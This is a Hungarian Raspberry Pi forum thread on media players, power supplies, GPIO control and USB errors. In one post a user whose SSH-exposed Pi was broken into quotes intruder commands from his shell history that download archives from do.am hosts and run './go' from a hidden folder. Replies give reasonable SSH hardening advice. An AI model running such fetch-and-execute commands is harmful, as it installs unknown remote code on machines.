-
PROHARDVER!
Amit érdemes tudni a Raspberry Pi-kről:
A legelső változat 2012-ben jelent meg. Pici, olcsó és nagyon alacsony fogyasztású, hobby-célú kártyagép. Felépítése ARM alapú, nem PC-architektúra, hanem kb. egy régi mobilhoz hasonló. Nagyon sok mindenre használható! A Linux-nak és a magas eladási mennyiségnek köszönhetően jelentős fejlesztőtáborral rendelkezik.
Új hozzászólás Aktív témák
-
trance89
őstag
válasz
larryking #9189 üzenetére
nem csak a popcornokat hanem a médialejátszók túlnyomó többségét is, amúgy sztem az openelec 4.2-től kezdve érezhetően gyorsult a masina mindenféle oc nélkül, már nem látok kissebb laggokat sem a menüben és mintha gyorsabb lenne a reakcióideje is
azt már csak hozzátenném hogy már így is jóval gyorsabb/megbízhatóbb a működése mint a wdtv streaming amiről áttértem -
Hali!
Valaki rakott már az UART-ra RS485-öt? Saját építés vagy vásárolt?
-
escape
aktív tag
Van valami tapasztalat arra vonatkozóan, hogy a Pi képes-e 3D-s film lejátszására? 3D-s projektorral lenne összekötve, fogja-e bírni, vagy mire érdemes figyelni a film formátumánál?
-
larryking
senior tag
-
A gyerekek nálunk úgy néznek youtube videókat, hogy az asztali gépen a böngészőből indítjuk ezzel a kiegészítővel: Play to XBMC
Úgy tudom Androidra is van ilyen, ami xbmc-n indítja a lejátszást.
-
larryking
senior tag
válasz
sad_Vamp #9187 üzenetére
Nekem a popcornal csak egy két bajom volt. Egy túlhypeolt vacak (csak szigorúan saját vélemény, saját tapasztalat alapján) szerintem, persze a sigma chip az kiváló, de a mögé épített rendszer....hm.
A 200 zúgott, és nem látta olykor olykor a megosztást, lassú és most is drága. A 210 nem zúgott, de túlmelegedett, megosztás gondok. Mindkettőről elmondható, hogy marha lassan reagált. A 300 Semmivel nem adott többet mint az előzőek, és mindháromról elmondható, hogy nagyon drága. A pi sem jobb, vagy több, hanem pont ugyan azt tudja. Lassú, döcög néha, lejátszás hibátlan, CEC, XBMC, a közösség hasonló nagyságú mögötte. Mennyiért is? És persze nézhetném a fogyasztást, vagy hogy oda vissza körbe röhögi szoftverben a popcornokat... -
Cyber_Bird
senior tag
Nekem tobb mint egy eve fut openelec egy raspin anyukamnal. Egyszer egyszer kellett kihuznia a tapot ez ido alatt, es mas gondja nem volt. Tehat medialejatszasra szerintem teljesen alkalmas neki, cec-nek koszonhetoen meg egyszeru is kezelnie, sokkal jobban szereti, mint regen amikor asztali geprol nezte.
-
sad_Vamp
őstag
válasz
larryking #9185 üzenetére
Szabad tudni, hogy a Popcorn-nal mi bajod volt? Én pl. nagyon ritkán találok olyan file-t amit nem visz, vagy nem jól visz. Egyetlen probléma ha az MKV-be nincs beágyazva a felirat, akkor ezt gépen kell megtennem. a YT u.o. gagyi rajta mint bármelyik TV-n böngészni meg inkább meg sem próbáltam se a Popin, se smartTV-n.
Amúgy azok a direct RPi-s Noobs-os samsung SD-k megfelelően gyorsak az oprendszer futtatására? (most van bundleban model B+ meg kártya)
-
larryking
senior tag
Azt nem értem, mi okból várunk el többet a kis pitől mint ami. Mindent meg lehet oldani, persze azt nem mondtam, hogy gyors is lesz. Film nézésre, illetve youtubera viszont drágábban is vannak sokkal rosszabb megoldások, mondom ezt meganbyi egreat és popcorn lejátszó után...
-
lolka1980
aktív tag
válasz
lord.lakli #9180 üzenetére
Köszönöm.
Akkor meg is rendelem. -
larryking
senior tag
válasz
lord.lakli #9175 üzenetére
Youtube pipa, hd movie pipa, rasbmc alatt a böngészés is ok lehet.
-
lolka1980
aktív tag
Sziasztok!
Mivel én XBMC-t futtatok rajta és 24h ban megy a letöltés illetve samba úgy gondoltam kapna egy WD10JFCX ilyet.
Mi a véleményetek?
pl.:
Nem lesz gond a a "fejparkoltatás"?
stb. -
n00n
őstag
Köszönöm, akkor más megoldás után nézek.
-
n00n
őstag
Sziasztok!
Szülők szeretnek úgy filmezni, hogy a laptop rá van kötve a TV-re. Viszont megadta magát a lapos pár hete és kellene valami utód. Viszont a legolcsóbb laptop is túl sok erre a feladatra. A kérdésem: Csak filmezni (1080p), netet böngészni (FB, youtube) megéri szerintetek megvenni az RPI-t?
-
wassermann
Topikgazda
A "buszos" otthon automatizálás épületekhez köthető része alapvetően világítást (fényt), redőnyöket, fűtés-hűtést, szellőztetés és a locsolást öleli fel. Kapcsolódó rendszerek lehetnek még a beléptetés, tűzjelzés, riasztó, kamerák (de ezek legtöbbször különálló készülékek)
Ha ilyenekre rákeresel: EIB, KNX akkor már többet megtudhatsz a buszokról. van vezetékes és vezeték nélküli is. Régebben volt a termicont.hu-n egy tudásbázis ilyen témában. -
Jim-Y
veterán
Sziasztok.
Otthon automatizálás, intelligens rendszerek, intelligens eszközök témában nem tudtok jó forrásokat (könyv, videó, article, stb)? Bármi jöhet
Köszi.
megj: pontosítás: azt kell vizsgálnom, hogy a mai életünkben az intelligens eszközök (otthon, vagy út közben)hogyan működnek, milyen csatornákon folyik a kommunikáció, mik a határok, meg amit még el tudtok képzelni.
megj2: ha estleg valaki tudja, hogy melyik hazai könyv áruház foglalkozhat hasonló műszaki könyvek árusításával, kérem ossza meg, köszi
-
Den
veterán
válasz
sztanozs #9148 üzenetére
Hát... Nagyon más irányba mentem, vállalkoztam, meg ilyenek, és nem volt időm fórumozni
Illetve lett volna egy kicsi, de kicsit nem tudtam fórumozni, mindig sok lett belőle, így a teljes megvonás volt a megoldás. Most igyekszem csak olyan topicba benézni amibe muszáj, nehogy megint beszippantson a dolog
-
moli.hu
őstag
válasz
csimpas #9156 üzenetére
ja es 22-esrol tedd at masra az ssh-t, mar az is sokat segit. De legjobb, ha olvasol sshd hardening leirasokat, akkor jobban atlatod, hogy mit kell meg allitani.
Mi volt a jelszo amugy? pontosan. (ha barhol mashol hasznaltad az a jelszot, ajanlott megvaltoztatni. eleve ajanlott minden helyen kulon jelszot hasznalni)
Szerencsed, hogy a csavo olyan barom volt, hogy megvaltoztatta a jelszot, igy gyakorlatilag azonnal lebukott. ettol meg lehet, hogy mas mar reg bentvolt a gepen ugyanazzal a tamadassal (dictionary?), o viszont volt olyan okos, hogy eltuntette a nyomokat. Szoval erdemes atgondolni, hogy amiota ez a jelszo, a teljes eltelt ido alatt milyen kenyes dolgot vegeztel a gepen, onnan hozzaferheto volt-e mas geped. -
moli.hu
őstag
válasz
Hyperion #9157 üzenetére
szerk: elbasztam a "valasz erre"-t.
@csimpas: azt is vedd figyelembe, hogy ilyenkor az azonos halozatra kotott gepeket is at kell nezni, vagy ha komolyabban veszed a biztonsagod, es a tobbi gepeden ilyen szabalyokat hozol es tartasz be, akkor feltortnek kell tekinteni.
ssh root
fail2ban
ssh password login -
Hyperion
senior tag
válasz
csimpas #9156 üzenetére
alap jelszo, alap usernev, alap port = kinyitod az ajtot a betoro elott.
Ha nem volt semmi ertekes, reinstall az egesz. gyorsabb mint megkeresni, hogy mit csinaltFriss rendszernel a szokasos eljarassal fojtasd:
ssh port valtoztatas
pi jelszo valtoztatas
root user ssh-jat letiltani.
fail2ban telepites
ha lehet korlatozni az ssh belepes forrasat. -
csimpas
tag
válasz
sad_Vamp #9150 üzenetére
érdekes dolog történt
nem tudtam ssh-n belépni a pi felhasználóval,a régi jelszavammal, majd root ként megváltoztattam a pi user jelszavát, beléptem pi felhasználóként, puttyban felfele nyíl, és egy csomó olyan parancs volt kiadva, amit nem én adtam ki, és más rajtam kívűl nem használja a raspberry-t...
wget prg.do.am/milan.tgz
wget prg.do.am/milan.tgzwget prg.do.am/milan.tgz
wget database.do.am/loginIRC/newbnc.tgz; tar xzvf newbnc.tgz; cd .new ; ./goilyen parancsok lettek kiadva
ilyenkor wtf van?
szerk:22es port nyitva volt
-
lolka1980
aktív tag
Sziasztok!
OpenelecRendszer-->Rendszerinfó-->Hardver
Itt miért látok csak 372MB-ot Teljes memóriának?Nem 512nek kellene lenni
Ez normális?
Raspberry pi B -
azbest
félisten
válasz
bambano #9152 üzenetére
A passzív adaterből / kábelből a hdmi-dvi és a dvi-hdmi teljesen ugyanaz. A hdmi az eleve dvi kompatibilis kell legyen, szóval a két eszközön múlik elsősorban, hogy milyen protokollal kommunikáljanak. Persze valami kis trükk még lehet a dologban, ha a dvi protokollt ki akarják kényszeríteni a kábellel.
Annó az ati-nál volt, hogy a gyári átalakítót kellett használni, hogy a dvi kimenetes kártya kiadja a hangot is, ha hdmi eszközre kötötték. Viszont a dvi kimenetes alaplapi integrált ati-m alapból hdmi jelet adott ki (hdmi monitorral használva).
Ha valaki olyat szeretne, hogy a hdmi és dvi protokoll közt legyen váltás, na ott már aktív eszköz kell. Azoknál már átalakító függő lehet, hogy támogatják-e mindkét irányt (meg ugye a hang rátevést vagy levételt). A hdmi csomagokra bontva küldi a képadatot (így megy át a kép közt a hang csomag is). A dvi viszont csomagolás nélkül tolja át a bitstreameket, ezért sem tud ezen a protokollon hang átmenni.
-
Den
veterán
válasz
sad_Vamp #9144 üzenetére
Én is kb ezen a szinten vagyok, hasonlóan ambiciózus tervekkel
Több mint egy éve megvan a pi, csak időm nincs foglalkozni vele, most 3d nyomtató mellé használom nyomtatószerernek, de a műhelybe akarok egy diagnosztikai eszközt csinálni motorokhoz, pi alapon. Én a kijelző problémáját úgy fogom megoldani, hogy nem lesz semmilyen kijelző, hanem okostelóról, tablettről, notiról lehet majd kontrollálni, meg kiolvasni.
230v kapcsoláshoz is vannak relémodulok asszem a malnapc-n és rpiboltban is, io-rók vezérelhetők. Mobilokra meg vannak appok, amivel az io portokat lehet egyszerűen vezérelni, pl ios-re a pibuddy.
-
sad_Vamp
őstag
Amint írtam motor mellett még egy 230V(3000W) ki be kapcsolása is terítéken lenne (esetleg később hőmérséklet/páratartalom ellenőrzés), szóval nem baj ha az IO board nagyobb vagy picit drágább csak legyen jó meg megfelelő. Sajnos egyelőre tök noob vagyok az egészhez (igazából programozni is annó alapokat tudtam pascalban de ma már azt se), de érdekel a téma, és szeretném ezt a problémámat megoldani, mert idegesítenek a félmegoldások.
A kijelzőn én is gondolkodtam, de HDMi-set nem könnyű találni, a másik meg hogy a műhelyben nem akadály hanem épp előny ha kisebb a mérete (igazából a gépem is csak 13"... hozzá vagyok szokva) érdekes hogy ilyen kicsikből kész kijelzőt nem találtam, csak mókolósat. Szóval, gondolkodom.
-
Den
veterán
válasz
sad_Vamp #9142 üzenetére
Közvetlenül az io portokról csak nagyon kis teljesítményű dolgokat tusz vezérelni, motorhoz kell egy külső vezérlő. Itt van egy: [link] a malnapc.hu- n lehet kapni. De vannak mások is. Én egy gertboardot vettem, de az elég drága és nagy, sok funkciója van, csak a motorvezérlő miatt nem érdemes megvenni.
Kijelzőnek szerintem jobban jársz, ha veszel egy használt hdmi-s tv-t vagy monitort, árban nem sokkal több mint ezek az egérmozik, és nem kell vele bütykölni.
-
fraba
aktív tag
Sziasztok!
Adott egy B modell egy 4 GB-os SD kártyával, rajta NOOBS. Ha minden igaz, akkor a raspbian fut rajta (teljesen fű vagyok még a linuxhoz
), és a próbálkozásaim által okozott minimális káoszt szeretném egy format c-vel eltüntetni, tiszta lappal indulni és újrarakni az OS-t. Ha ez lehetséges (márpedig gondolom, hogy az) akkor mik a lépései?
Előre is köszönöm a segítséget!
-
sad_Vamp
őstag
válasz
bambano #9133 üzenetére
Ahogy nézem ez leszed a GPIO portból meg mittomén mire csatlakozik, az érintős rész is pénz kidobás számomra, festékes kézzel nem fogom tapicskolni a felbontás meg kicsit kevésnek tűnik.
3-4 célra szeretném a cuccot használni:
1.+2. megfigyelő berendezés PiCAM noir-ral, monitoroznám a helységet (legjobb ha beírnám az IP-t kijönne egy weboldal és tulképp csak akkor indítan a live streamet) és hőmérsékletet korrigálnák (csak kapcsolnák egy 230Vos hosszabbítót nem több)
2. egy villany motor irányítása valami programon keresztül ( fordulat szám, irány ilyemsik)
3. filmnézés (régi DivX nem HD, DVD-rom USB-n és úgy)ha a 2 és 3 egyszerre kivitelezhető lenne, az lenne a legjobb, de gondolom nem valószínű
Lehetséges szerintetek ez vele, mármint hogy 1 darabbal (max 2 külön kártya)?
-
sad_Vamp
őstag
Újra elgondolkodtam a RPi-n eddig a fő visszatartó erő a HDMI portos képernyő volt, de most találtam ilyeneket:
Van valakinek tapasztalata valamelyikkel? azt tudom, hogy a 4D Systemses a hivatalos elméletileg, de azért a másik 2ő mellett rohadt drágának tűnik. Mennyire lehet bonyolult beüzemelni a kínaiakat? (vázat/keretet csinálni neki nem, probléma a táp meg a softwares "installálás" érdekel főleg)
-
Proci85
senior tag
Sziasztok
Próbáltam több mobil töltővel is meghajtani a Pi-t, de az 1-2 mérőpontokat nézve 4.74, 4.84 V körüli feszültségeket mértem. 5V még SD kártya nélkül, üresjáratban sem volt.
Melyik táp ajánlott, ami korrekten kiadja az 5V-t és tartani is tudja?ui. több topikhoz hasonlóan egy bevezető hsz hasznos volna az ehhez hasonló ismétlődő kérdésekre. Próbáltam keresni az ajánlott tápokat, de nem találtam.
-
kyd
tag
Üdv!
B+ változatnál, mind a négy usb-t akarom használni akkor ez a töltő jó lenne: [link], ha ez nem jó akkor tudok valami jó töltőt ajánlani? -
Hyperion
senior tag
válasz
sanchomuzax #9119 üzenetére
Nekem úgy tűnik, hogy a touch screen-el gyűlt meg a baja.(Device 8)
szvsz valamiért leszakadt...
Az működik?Elég friss dolog a FIQ megszakítás kezelés a raspinál, szóval lehet hogy nem tökéletes még.
De ha ritkán jön elő a hiba, szerintem ne foglalkozz vele... -
sztanozs
veterán
válasz
sanchomuzax #9119 üzenetére
FIQ reported NYET. Szerintem az oroszok próbáltak betörni a rendszeredbe, de nem sikerült...
-
sanchomuzax
aktív tag
Tegnap este hisztizett egyet a kernel az usb miatt. Aztán abbahagyta. Mi lehet ez? Ebben az idősávban semmit sem tettem a vassal.
Sep 28 19:20:30 raspberrypi kernel: [1194475.674962] Transfer to device 8 endpoint 0x1 frame 1250 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:20:31 raspberrypi kernel: [1194476.155027] Transfer to device 8 endpoint 0x1 frame 1730 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:20:31 raspberrypi kernel: [1194476.715097] Transfer to device 8 endpoint 0x1 frame 242 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:20:33 raspberrypi kernel: [1194478.035285] Transfer to device 8 endpoint 0x1 frame 1562 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:27:40 raspberrypi kernel: [1194905.153306] Transfer to device 8 endpoint 0x1 frame 590 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:27:41 raspberrypi kernel: [1194906.843541] Transfer to device 8 endpoint 0x1 frame 232 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:27:43 raspberrypi kernel: [1194908.223727] Transfer to device 8 endpoint 0x1 frame 1612 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:27:45 raspberrypi kernel: [1194910.550039] Transfer to device 8 endpoint 0x1 frame 1890 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:29:09 raspberrypi kernel: [1194994.921501] Transfer to device 8 endpoint 0x1 frame 234 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:29:11 raspberrypi kernel: [1194996.805754] Transfer to device 8 endpoint 0x1 frame 70 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:29:12 raspberrypi kernel: [1194997.451840] Transfer to device 8 endpoint 0x1 frame 716 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:33:43 raspberrypi kernel: [1195267.973586] Transfer to device 8 endpoint 0x1 frame 865 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:37:02 raspberrypi kernel: [1195467.476705] Transfer to device 8 endpoint 0x1 frame 1685 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:37:04 raspberrypi kernel: [1195469.127912] Transfer to device 8 endpoint 0x1 frame 1288 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:37:05 raspberrypi kernel: [1195470.540105] Transfer to device 8 endpoint 0x1 frame 652 failed - FIQ reported NYET. Data may have been lost.
Sep 28 19:37:06 raspberrypi kernel: [1195471.740284] Transfer to device 8 endpoint 0x1 frame 1852 failed - FIQ reported NYET. Data may have been lost.Az USB-n ez csücsül éppen:
pi@raspberrypi:~$ lsusb
Bus 001 Device 002: ID 0424:9512 Standard Microsystems Corp.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 008: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen
Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp.
Bus 001 Device 004: ID 05e3:0608 Genesys Logic, Inc. USB-2.0 4-Port HUB
Bus 001 Device 005: ID 04e8:2f03 Samsung Electronics Co., Ltd
Bus 001 Device 007: ID 05e3:0608 Genesys Logic, Inc. USB-2.0 4-Port HUB
Bus 001 Device 017: ID 03f0:5d11 Hewlett-Packard PhotoSmart C5200 seriesAzaz HDD művelet lehetett, és ezen hisztizett, hogy nem tudja végrehajtani? Ilyenkor adatot is veszt, vagy újrapróbálkozik?
-
zka67
őstag
Szia, a relé valóban nem túl jó ötlet, egyrészt mert elég sok áramot fogyaszt. Az elengedéskor jelentkező impulzust ki lehet ugyan szűrni egy diódával, de ez akkor sem jó megoldás.
Ami neked kell, az egy BS170 (vagy hasonló) FET, aminek az S lábát a 0V-ra kötöd, az S és a G lábak közé teszel egy 100k-s ellenállást, a vezérlés és a G közé egy 10k-sat, és a D-t rákötöd a táp bekapcsoló bemenetére.
Tranzisztorral is meg tudod csinálni, az E-t a 0V-ra kötöd, a B-E közé teszel egy 10k-s ellenállást, a vezérlés és a B közé 1k-t, és a C-t kötöd a táp bekapcsoló bemenetére.
-
golya87
őstag
Kiderült, hogy a múltkori problémát a tápom meghalása okozta. Ez egy Motorola gyártmányú 3A 12V-os példány volt. Erről ment az RPi és 50db LED, mekkora tápot érdemes ehhez venni? Elég 3,2A vagy 5A?
-
Den
veterán
Még egy kérdés. Vettem egy ilyet: [link] Ezzel szabályosan lehet leállítani a raspit gombnyomásra. Elég egyértelmű a bekötése, és működése. Csakhogy... Én a 3d nyomtató mellé használom a pi-t octopi-al. Most javítom fel a nyomtatót egy atx táppal, és mivel sz ad 5 voltot, arról akarom mehajtani a raspit is. De... Úgy szeretném megoldani, hogy az atxraspi a táp standby 5 voltjáról menjen, és bekapcsoláskor a táp bekapcsoló ágát zárja. Az atx táp viszont úgy kapcsol be, hogy az egyik vezetékét testre kell kötni, az atx raspi viszont bekapcsoláskor a kimenetén 5 voltot ad. Tehát valami relét kéne rákötni ami mikor megkapja az öt voltot, zárja a táp bekapcsoló áramkörét.
Viszont azt olcastam hogy a relé nem túl jó megoldás mert kikapcsoláskor a tekercse ad egy elektromos impulzust, ami tönkreteheti az elektronikus komponenseket, valami félvezető kapcsolót kéne használni. Viszont én egyáltalán nem értek az ilyesmihez. Tudna valaki segíteni, hogy mivel oldjam meg?
-
Den
veterán
Üdv..
Próbálta valaki a raspicam-et hosszabb szalagkábellel? Konkrétan méter körülire gondolok. Vettem már 62 centist, de még nem próbáltam mert változott az eredeti koncepció. Egy felpattintható kis állványa lett volna 3d nyomtatóhoz, de hirtelen ihlettől vezérelve vettem egy flexibilis mobil tartó "kart" és annak a gömbfejéhez nyomtattam tokot, amivel a kamerát szabadon lehet pozícionálni. Viszont ez a kar önmagában hosszabb mint a szalagkábel, és a karhoz rögzítve akarom vezetni, hogy ne lógjon a levegőben. Ebay-en találtam 100 illetve 150 centis kábelt is. Nem túl drága de nem akarom potyára megrendelni, ha valakinek van tapasztalata azt megköszönöm ha megosztja, illetve ha tud valaki itthon 62 centinél hosszabb kábelt, az nagyon jó lenne. -
trance89
őstag
-
CPT.Pirk
Jómunkásember
Szerintetek az ezen az LCD-n lévő gombok gyak. GPIO-ként beolvashatóak? [link] Elég olcsó cucc a hazai árakhoz képest.
-
golya87
őstag
válasz
Cyber_Bird #9102 üzenetére
Én a Milhouse verzióval szemezek egy ideje, pár percet használtam is, de még nem volt lelkierőm átállni arra.
De fentebb inkább a stabil kiadásra gondoltam. -
Cyber_Bird
senior tag
válasz
trance89 #9103 üzenetére
En mondjuk napi hasznalatra hasznalom. Szerintem alpha 4-hez kepest eleg stabil, pedig baratnom eleg magas elvarasokat tamaszt a lejtszo rendelkezesreallasaval szemben
Mondjuk teny, hogyha nem tudsz barmikor raszanni 30-40 percet hogy ujrahuzd, akkor nem erdemes ilyen nem vegleges szoftverekkel kiserletezni, mert attol fuggetlenul, hogy most stabil, barmikor elojohet egy bug. -
trance89
őstag
válasz
Cyber_Bird #9102 üzenetére
ami tegyük hozzá nagyon kezdetleges státuszban van, mindennapi használatra nem ajánlott
-
trance89
őstag
válasz
lolka1980 #9100 üzenetére
http://wiki.openelec.tv/index.php/Updating_OpenELEC
röviden: mielőtt frissítenél ajánlott factory resetelni az openelec-et, (settings -> openelec menüpont) mert főverziót ugrasz, utána pedig csak leszeded a .tar fájlt ([link]), nem a diskimage-et és ha be van kapcsolva a pi akkor csak hálózaton bemásolod az update mappába, ezután csak újraindítod a raspit (lenti kikapcs ikon -> reboot), semmi bonyolult
Új hozzászólás Aktív témák
Hirdetés
- Megaport gaming pc + billentyű
- ! AMD Brutál Gamer Konfig ! 9800X3D / 7900XTX ( RITKASÁG ) 32Gb RAM 32Colos ROG Monitor
- Beszámítás! HP Z2 G4 Tower Workstation számítógép garanciával, hibátlan működéssel
- Beszámítás! Apple Mac Studio M2 MAX 2023 32GB 512GB SSD számítógép garanciával, hibátlan működéssel
- Beszámítás! Apple Mac mini 2020 M1 8GB 256GB SSD számítógép garanciával, hibátlan működéssel
- BESZÁMÍTÁS! Intel Core i9 14900KF 24 mag 32 szál processzor garanciával hibátlan működéssel
- iKing.Hu - Apple 16 Pro Max - Natural Titanium - Új, kipróbált
- AKCIÓ! Apple MacBook Pro 13 2022 M2 8GB 256GB SSD garanciával hibátlan működéssel
- ÁRGARANCIA!Épített KomPhone Ryzen 7 7700X 32/64GB RAM RTX 4070Ti Super GAMER PC termékbeszámítással
- Asus Rog Strix G16
Állásajánlatok
Cég: CAMERA-PRO Hungary Kft
Város: Budapest
Cég: PC Trade Systems Kft.
Város: Szeged